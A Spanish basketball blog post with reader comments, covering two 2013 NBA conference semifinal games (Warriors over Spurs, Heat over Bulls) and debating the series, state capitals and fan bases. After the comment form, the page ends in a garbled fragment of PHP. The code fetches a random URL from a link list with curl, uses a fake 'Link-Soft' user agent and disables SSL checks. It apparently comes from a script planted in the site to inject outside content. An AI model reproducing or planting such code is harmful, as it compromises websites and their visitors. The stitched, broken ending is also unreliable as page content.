La Crónica: Tablas en las semis

09 de May de 2013 por Simon

Así están todas las series de semifinales de conferencia tras los dos primeros partidos. Ayer veíamos cómo New York y Memphis conseguían igualar las suyas y hoy le tocó  el turno a Golden State Warriors y Miami Heat que se repusieron de sus dolorosas derrotas en el primer partido para llevarse el segundo.

Golden State disipó cualquier duda sobre cómo le podía afectar el haber perdido el anterior partido tras ir ganándo durante gran parte del mismo con amplias rentas.  Los de Mark Jackson salieron al AT&T Center enchufados desde el comienzo y pronto abrieron las primeras ventajas gracias a la pareja Curry & Thompson que anotaron 11 y 12 puntos respectivamente en el primer cuarto. Pero fue en el segundo cuarto en el que Golden State rompió el partido y consiguió abrir rentas que rozaron la veintena de puntos gracias a los 17 puntos de Klay Thompson en este cuarto, 29 en la primera parte. En el tercer cuarto San Antonio comenzó a jugar mejor y a ser capaz de robar más balones en defensa y recortaron la diferencia de manera notable. Por momentos parecía que los de Popovich iban a conseguir otra gran remontada pero esta vez unos Warriors más descansados y concentrados nunca dejaron que San Antonio se acercara más allá de los 5-6 puntos por lo que la victoria terminó cayendo del lado californiano (100-91). La serie queda igualada y con pronóstico totalmente incierto, lo único que parece claro es que vamos a vivir una eliminatoria preciosa. Como ya hemos comentado, Klay Thompson fue el mejor del partido con 34 puntos y 14 rebotes, Curry no tuvo mala noche pero estuvo más terrenal, 22 puntos, 4 rebotes y 4 asistencias.  En San Antonio, Tim Duncan y Parker estuvieron en sus números pero se vieron sorprendidos por la gran primera mitad de Warriors y en esta ocasión no les dio para remontar. 

En el otro partido de la jornada ocurrió  lo que prácticamente todo el mundo esperaba. El campeón estaba herido y ya saben que todas las bestias son más peligrosas en semejante estado. Miami no dio ninguna concesión a Chicago Bulls en un partido muy duro y físico que acabó con Noah y Gibson expulsados en el último cuarto. Los de Illinois tan sólo aguantaron el marcador durante el primer cuarto y mediados del segundo. A partir de ahí Miami se disparó y quiso dar una demostración de poder, querían ganar apabullando al rival y así fue. El marcador final (78-115, la máxima diferencia a favor de los Heat en un partido de playoffs) lo dice todo. Por si alguien tenía dudas y pensaba que Chicago iba a poder poner contra las cuerdas al campeón ahí estaban los Heat liderados en anotación por sus suplentes martilleando una y otra vez el aro de Chicago. Los titulares de los Heat apenas se vieron exigidos a forzar en la segunda parte. El mismo James no anotó tras el descanso y tan sólo él entre los titulares superó la treintena de minutos, de hecho, el máximo anotador de Miami fue Ray Allen con 21 puntos. Los jugadores de Chicago se vieron superados desde el primer momento por el poderío de Miami y poco más pudieron hacer. Jimmy Butler esta vez no jugó los 48 minutos, pues su entrador con buen criterio lo sentó una vez esfumada la posibilidad de victoria. Ahora la serie viaja a Chicago, donde los de Thibodeau tratarán de volver a sorprender a Miami Heat, aunque comprobando el nivel mostrado por Miami y las pocas concesiones que van a dar tras la derrota inicial se antoja una tarea muy complicada.

PREMIOS

MVP: Exhibición de Klay Thompson. Anotó 8 de los 9 triples que intentó y acabó el partido con 34 puntos y 14 rebotes.

Rookie: Draymond Green hace de todo. Ayer anotó 5 puntos, cogió 7 rebotes y repartió 5 asistencias. Harrison Barnes anotó 13 puntos pero no estuvo muy fino de cara a canasta.

Sorpresa: Con LeBron, Wade y Bosh sentados tranquilamente viendo el espectáculo fue el turno de los suplentes de los Heat. Los mejores fueron Ray Allen, autor de 21 puntos, y Norris Cole, que se fue a los 18.

Decepción: Esta vez Nate Robinson no pudo evitar la derrota de los Bulls. Se quedó en 11 puntos y perdió 4 balones.

Esfuerzo en vano: Tim Duncan y Tony Parker estuvieron correctos pero no súper. Ambos llegaron a la veintena de puntos.

Imágenes | AP Photos / Getty Images

Comenta

24 comentarios a esta entrada

  1. Denise dice:
    #1

    Gran crónica Simón, solo una cosa, los Bulls no son de Michigan.

    Grandisima noticia para el espectaculo la victoria de GSW. Yo pensaba que tras perder de forma traumatica el choque que ya tenían ganado, se vendrían abajo moralmente, pero han sabido reaccionar bien, y por lo que os leo, han vuelto a ser muy superiores a SAS. No obstante, la juventud puede hacer que tengan vertigo del triunfo. Creo que va a ser una serie larga y posiblemente resuelta en 7 partidos.

    ¿Se sabe algo de David Lee? Con Denver jugó un minuto y medio.., ¿no está ni siquiera para jugar 3 minutos por cuarto?

      Citar

  2. Laker1624 dice:
    #2

    Buenos días!

    En mi opinión estas son las 2 eliminatorias en las que si hay un claro favorito en cada una de ellas para pasar a final de conferencia, especialmente en el Heat-Bulls.
    Creo que San Antonio acabara imponiéndose a los Warriors, pero les va a pasar factura en lo que a físico se refiere de cara a las próximas eliminatorias. Pienso que el estilo de juego de Golden State le va a suponer un desgaste importante en defensa a San Antonio.

    Saludos

      Citar

  3. MagicJohnson32 dice:
    #3

    Denise:
    Gran crónica Simón, solo una cosa, los Bulls no son de Michigan.

    Bien visto. Lo corrijo. Por cierto, si alguien sabe cuál es la capital de Illinois sin mirarlo… bueno, le felicito, porque no es fácil, jeje, yo no lo sabía hasta hace bien poco.

      Citar

  4. MagicJohnson32 dice:
    #4

    Pues no veo a los Spurs ganando a GSW. Han sido claramente inferiores en los dos partidos jugados en SA y lo van a tener francamente difícil para ganar en Oakland. Además, la defensa exterior es un problema difícil de solventar. Curry le hace un hijo a Parker, y si Popo le pone a Kawhi entonces los Warriors buscan a Klay, que le hace otro hijo a Parker, y así sucesivamente.

      Citar

  5. txusma dice:
    #5

    Denise:
    Gran crónica Simón, solo una cosa, los Bulls no son de Michigan.

    Fallo mío no de Simón. Gracias por el aviso.

      Citar

  6. melo15 dice:
    #6

    Ojo con los Warrios que podrian ser una de las mayores sorpresas en los ultimos años.
    Visto lo visto los de Oackland han sido superiores apesar de que jugaban fuera de casa, asi que imaginaos como luciran en casa.

      Citar

  7. Esteban dice:
    #7

    muchisimo cuidado con los WARRIORS

    ahora tocan dos partidos de local, con esas camisetas amarillas que hacen del estadio algo unico, una localia feroz en un equipo enrachado (recuerdan a los mavs 2011?)

    por otra parte ya tuvieran terrible presion cuando estaban 3-2 jugando de local frente a devner y se impusieron a esa presion

    no digo que sea una serie ganada, pero si vuelve lee…

      Citar

  8. HisRoyalAirness dice:
    #8

    Creo GS no pasa la eliminatoria ni de broma. Los triples no entran todos los día y no se puede vivir de eso.
    Lo de Miami tampoco me sorprende demasiado. Tienen el triple de plantilla y que no se vayan a pensar que han hecho algo grande. Si uno de tus “suplentes” es Ray Allen pues mira tú…mira que les tengo manía.

    Y la capital de Illinois es…Springfield!! Hace poco me retaron con capitales yankis y me piqué porque no daba una y las miré todas! Es un juego que os recomiendo, hace que te entren ganas de suicidarte

      Citar

  9. melo15 dice:
    #9

    Royal, me parece que a los Warriors SI que les entran todos los dias.

      Citar

  10. Denise dice:
    #10

    HisRoyalAirness: Creo GS no pasa la eliminatoria ni de broma. Los triples no entran todos los día y no se puede vivir de eso.Lo de Miami tampoco me sorprende demasiado. Tienen el triple de plantilla y que no se vayan a pensar que han hecho algo grande. Si uno de tus “suplentes” es Ray Allen pues mira tú…mira que les tengo manía.Y la capital de Illinois es…Springfield!! Hace poco me retaron con capitales yankis y me piqué porque no daba una y las miré todas! Es un juego que os recomiendo, hace que te entren ganas de suicidarte

    Pero por qué no?? Si han jugado 2 fuera de casa y han sido superiores en los dos…

    Lo de Miami, pues tiene su merito, han confeccionado una gran plantilla con la dificultad que ello tiene en la NBA por las restricciones, y encima los jugadores lo estan haciendo bien. No siempre grandes plantillas con jugadores de renombre triunfan….vease Lakers.

      Citar

  11. rumbero dice:
    #11

    HisRoyalAirness:
    Creo GS no pasa la eliminatoria ni de broma. Los triples no entran todos los día y no se puede vivir de eso.

    Yo pensaba igual pero empiezo a tomarme el perímetro de GSW como algo muy muy serio. Contra Denver aun tenía dudas siendo la defensa de los Nuggets en el triple de lo peor de la NBA pero es que Pop tampoco ha encontrado la forma para frenarlos, y leñe, que las enchufan que da gusto estos de Oackland.
    Lo que si creo es que los últimos cuartos se les van a hacer muy largos aunque vayan 15 arriba. Ayer lo solventaron bien aunque llegaran a meterles el susto en el cuerpo. Por ahí tienen ventaja los Spurs.

    Por cierto Magic, tu amiga gritona de los Spurs ya tiene cuenta en twitter: https://twitter.com/SAScreamingLady

      Citar

  12. Laker1624 dice:
    #12

    En el caso de que GS llegue a finales de conferencia ¿Le dais alguna posibilidad contra Grizzlies o Thunder?
    Yo sigo pensando que pasaran los Spurs, pero si los Warriors lograran eliminarlos supongo que no sería tan descabellado pensar que también puedan dejar fuera a Grizzlies o Thunder.

      Citar

  13. Esteban dice:
    #13

    Laker1624:
    En el caso de que GS llegue a finales de conferencia ¿Le dais alguna posibilidad contra Grizzlies o Thunder?
    Yo sigo pensando que pasaran los Spurs, pero si los Warriors lograran eliminarlos supongo que no sería tan descabellado pensar que también puedan dejar fuera a Grizzlies o Thunder.

    al thunder sin westbrook? si
    a menphis, tambien

    creo que spurs y warrios al dia de hoy son los equipos con mas variantes de los 4 del oeste
    el q salga de alli, lo veo en la final del oeste

      Citar

  14. MagicJohnson32 dice:
    #14

    HisRoyalAirness:
    Y la capital de Illinois es…Springfield!! Hace poco me retaron con capitales yankis y me piqué porque no daba una y las miré todas! Es un juego que os recomiendo, hace que te entren ganas de suicidarte

    Muy bien, quesito azul para ti. Es tremendo, parece que estén elegidas a propósito para que no aciertes ni una. Capital de Florida: ¿Miami? ¿Orlando? ¿Jacksonville? No, Tallahasee. Texas, Oregon, Nevada, Minnesota, Washington… es imposible saberlas si no te las ‘estudias’. Bueno, y la de New York, que uno se jugaría la herencia a que es New York City, y resulta que no.

    rumbero: Por cierto Magic, tu amiga gritona de los Spurs ya tiene cuenta en twitter: https://twitter.com/SAScreamingLady

    No tío, no quiero saber nada, que por su culpa no disfruté como era debido del partidazo que se marcaron ambos equipos. Sólo pensaba: “que alguien le ponga un bozal a esa mujer, por favor”.

      Citar

  15. HisRoyalAirness dice:
    #15

    Lo de las capitales es enfermizo. El día que me preguntaron lo de NY estuve a punto de jugarme la vida.

    Puede que no esté yo muy entusiasmado con GS pero también lo digo porque los Spurs han tenido 8 días de descanso y eso en PO siempre se nota a medida que las series avanzan.
    Y si les doy alguna oportunidad frente a Grizzlies o Thunder? Frente a Thunder sin Westbrook por supuesto, frente a Memphis ni media. Les pueden montar un estropicio Zach y Marc por dentro sin David Lee que los dejan tibios. Bogut fuera por faltas en el segundo 30. No way

      Citar

  16. Lucho dice:
    #16

    Yo tambien veo a Memphis como favorito ante un hipotetico enfrentamiento vs los Warriors.
    No asi vs el Thunder. Ahi si creo que pasaria Golden State

    Como dicen uds los españoles…
    COMO MOLAN ESTOS WARRIORS!!!! Por favor!! No se si quiero que pasen los Spurs o GSW (por Curry o Manu, sobre todo) pero si quiero que en esta serie esté el campeon… O los Grizz, que cada dia juegan mejor!

    Pero que equipo, como mola en serio!!! Mas que nada por el magico Curry, pero tambien por Thompson, Lee, Barnes, Jack, Bogut, Landry, Green, Ezeli…. x favor!! Que buen futuro pinta por ahi, es tremendo

      Citar

  17. Denise dice:
    #17

    La de NY es Albany…pero como no os la sabeis??? Ayyy cuanto daño ha hecho la reformas educativas y los recortes…

    Menos NBA y más geografía, panda de incultos….xD

    A todo esto…cual os parece el mejor y el peor publico de la NBA? Ojo, teniendo en cuenta todas las etapas del club, es decir, es muy facil ahora ser seguidor de Miami y reventar la cancha cuando tienes a Lebron,Wade y Bosh mientras cuando estaban aquellos Heat de Wade con Chris Quinn, Jamario Moon, Dorrel Wright, Mark Blount..

    Yo el mejor no sabría decirlo, los peores Lakers y Knicks, es lo que tiene tener medio aforo lleno de Vips y turistas.

      Citar

  18. Sancho88 dice:
    #18

    Capital de California… Sacramento!! Es la mejor afición, o una de las mejores además

      Citar

  19. HisRoyalAirness dice:
    #19

    Denise lo de que la peor es la de los Knicks ni de coña, es una de las más fieles y con más criterio de lejos. Ya bastante denostada la han tenido. Con lo de L.A. estoy de acuerdo, salvo por el gran Jack.

    La mejor, según ex-jugadores, es la de Sacramento y la de Seattle en su día

      Citar

  20. HisRoyalAirness dice:
    #20

    Por cierto y que la capital de Texas sea Austin también manda mucha fuerza

      Citar

  21. GreenPride dice:
    #21

    Pues ya tenemos todas las semis de conferencia empatadas. Las cosas se ponen interesantes… menos en el Bulls-Heat que por mucho que quieran los Bulls no creo que tenga mucha historia.
    Esta vez el Rey LeBron se puso a jugar desde el salto inicial y aunque Wade y Bosh no entraron pronto en juego en cuanto lo hicieron el partido se acabó rápidamente. Los Bulls intentaron enfangar el juego con trifulcas y protestas pero de nada les sirvió ante el vendaval de los de Florida. Ni una supuesta vuelta de Rose creo que traería algo de igualdad a esta eliminatoria sobre todo si Wade y Bosh acaban de espabilar de una vez.
    En el Oeste sin duda está ese Spurs-Warriors que parece ser la gran eliminatoria de esta segunda ronda. Yo sí veo a los de la Bahía listos para eliminar a los Spurs. Les han superado claramente durante la mayor parte de los 2 encuentros y a estos sí que les entran siempre los triples. Además tienen muchísimos jugadores capacitados para hacer puntos, Curry, Thompson, Barnes, Jack, Landry y su estilo de juego va a hacer sufrir muchísimo a la defensa Spur. De hecho Jackson está siendo muy inteligente explotando la defensa de Parker. Básicamente los Spurs ponen a Leonard o Green sobre Curry y entonces Barnes o Thompson matan a Parker en cada ataque. Es un problema de difícil solución para los de San Antonio que necesitan a Parker en pista para su ataque.
    Si algo me hace dudar es ver que la falta de experiencia (que ya estuvo a punto de costarles el 6º contra Denver) les puede pasar mucha factura ante perros viejos como Duncan, Parker o Ginobilli. Los últimos cuartos como decíais antes se les van a hacer muy duros y algún partido igualado tendrán que ganar si quieren pasar la eliminatoria. Cuidadito con estos Warriors…

      Citar

  22. Denise dice:
    #22

    HisRoyalAirness: Denise lo de que la peor es la de los Knicks ni de coña, es una de las más fieles y con más criterio de lejos. Ya bastante denostada la han tenido. Con lo de L.A. estoy de acuerdo, salvo por el gran Jack.La mejor, según ex-jugadores, es la de Sacramento y la de Seattle en su día

    Nunca he estado en el Madison, pero tenía entendido que medio aforo está lleno de turistas, y eso hace que no sea una caldera. No me imagino a un japonés visitando el Madison y pegando voces para animar a los Knicks.

      Citar

  23. Lucho dice:
    #23

    Las que se me ocurren (hablo por sensaciones, no tengo demasiados argumentos)
    Me parece que:
    Mejores: Boston, Chicago, Detroit,Golden State, Memphis
    Peores: Toronto, Charlotte, Miami, Orlando, Washington,

      Citar

  24. Ruxixón dice:
    #24

    Denise:
    A todo esto…cual os parece el mejor y el peor publico de la NBA? Ojo, teniendo en cuenta todas las etapas del club, es decir, es muy facil ahora ser seguidor de Miami y reventar la cancha cuando tienes a Lebron,Wade y Bosh mientras cuando estaban aquellos Heat de Wade con Chris Quinn, Jamario Moon, Dorrel Wright, Mark Blount..

    La de Miami tiene fama de ser una de las que más se la pela el inicio de los partidos,ya sea el comienzo mismo o para la reanudación tras el descanso.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>